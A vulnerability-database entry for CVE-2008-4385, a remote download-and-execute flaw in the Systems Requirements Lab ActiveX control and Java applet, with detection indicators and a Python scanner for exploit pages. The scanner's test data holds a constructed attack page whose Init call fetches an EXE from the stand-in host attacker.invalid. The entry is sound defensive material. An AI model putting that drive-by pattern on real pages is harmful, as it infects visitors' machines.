CVE-2008-4385
published 2008-10-14

CVE-2008-4385: Husdawg, LLC Systems Requirements Lab 3, as used by Instant Expert Analysis, allows remote attackers to force the download and execution of arbitrary programs…

Priority: P3 (55) · Severity: critical, 9.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: available
EPSS: 37.68% (98.4th percentile)
Husdawg, LLC Systems Requirements Lab 3, as used by Instant Expert Analysis, allows remote attackers to force the download and execution of arbitrary programs by specifying a malicious website argument to the Init method in (1) a certain ActiveX control (sysreqlab2.cab, sysreqlab.dll, sysreqlabsli.dll, or sysreqlab2.dll) and (2) a certain Java applet in RLApplet.class in sysreqlab2.jar or sysreqlab.jar.

Affected (1 range)

Vendor                  | Product                  | Version range | Fixed in
systemrequirementslab   | system_requirements_lab  | (not given)   | (not given)

Detection & IOCs (extracted from sources)

filename: sysreqlab2.cab
filename: sysreqlab.dll
filename: sysreqlabsli.dll
filename: sysreqlab2.dll
filename: RLApplet.class
filename: sysreqlab2.jar
filename: sysreqlab.jar
command: Init("<payload_url>/<exe>.exe", "<vname>")
  • Monitor for ActiveX instantiation of sysreqlab2.dll (version 2.30.0.0) in browser processes, specifically calls to the 'Init' method with a remote HTTP URL as the first argument, which triggers download and execution of an arbitrary EXE.
  • Detect HTML pages that instantiate the sysreqlab ActiveX control and invoke the Init method with a remote URL argument pointing to an .exe file — the exploit delivers an EXE payload via 'Content-Type: application/octet-stream'.
  • Look for browser-spawned processes downloading and executing EXE files sourced from a URL passed as the first argument to the ActiveX Init method; the Metasploit module appends a random alpha string as the exe filename (e.g., <random>.exe).
  • Inspect Java applet loads for RLApplet.class within sysreqlab2.jar or sysreqlab.jar; the same unsafe Init method pattern applies to the Java vector.
  • The Metasploit module uses randomized spacing (Rex::Text.randomize_space) and random variable/filename strings, so static string signatures on the HTML payload page will have low reliability; focus detection on the ActiveX Init method call pattern and the EXE download behavior instead.
  • The SRVHOST may be set to 0.0.0.0, in which case the payload URL is dynamically resolved to the source address of the victim connection; network-based IOCs for the C2 host cannot be statically predetermined.
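A whitespace-tolerant scanner for the Init-with-remote-URL pattern the bullets above describe, written as an added example (not code from this database, the vendor, or the Metasploit module); the HTML samples, the host attacker.invalid and the filename QwErTy.exe are constructed placeholders.

```python
import re

# Filenames and class named in the advisory; a page referencing any of them
# together with an Init() call carrying a remote URL is the pattern to flag.
SRL_ARTIFACTS = re.compile(
    r"sysreqlab2?\.(?:cab|dll|jar)|sysreqlabsli\.dll|RLApplet\.class", re.I)

# Whitespace-tolerant match for <ctrl> . Init ( "<remote url>" , ... ): the
# exploit page randomises spacing, so every token gap is \s* and the URL is
# captured from inside the quotes.
INIT_CALL = re.compile(
    r"\.\s*Init\s*\(\s*['\"](https?://[^'\"]+)['\"]\s*,", re.I)


def scan_html(html: str) -> dict:
    """Flag a page that loads a Systems Requirements Lab artifact and calls
    Init with a remote URL; exe_payload is set when that URL ends in .exe."""
    artifacts = sorted({m.group(0).lower() for m in SRL_ARTIFACTS.finditer(html)})
    init_urls = INIT_CALL.findall(html)
    return {
        "artifacts": artifacts,
        "init_urls": init_urls,
        "suspicious": bool(artifacts) and bool(init_urls),
        "exe_payload": any(u.lower().endswith(".exe") for u in init_urls),
    }


# Constructed sample resembling the advisory's pattern (attacker.invalid and
# QwErTy.exe are placeholders, not real indicators); spacing is deliberately
# irregular to mimic randomised whitespace.
SAMPLE_MALICIOUS = """<html><body>
<object id="srl" codebase="http://attacker.invalid/sysreqlab2.cab"></object>
<script>
var  ctl  =  document.getElementById( "srl" ) ;
ctl . Init (  "http://attacker.invalid/QwErTy.exe"  ,  "x1" ) ;
</script></body></html>"""

# Constructed benign page: a remote-URL Init call on some unrelated control,
# with none of the SRL artifacts present, must not be flagged.
SAMPLE_BENIGN = """<html><body><object id="viewer"></object>
<script>viewer.Init("http://cdn.example/config.xml", "v");</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, scan_html(page))
```

Because the match keys on the Init call and the named artifacts rather than on literal page text, the randomized variable names and spacing mentioned above do not defeat it.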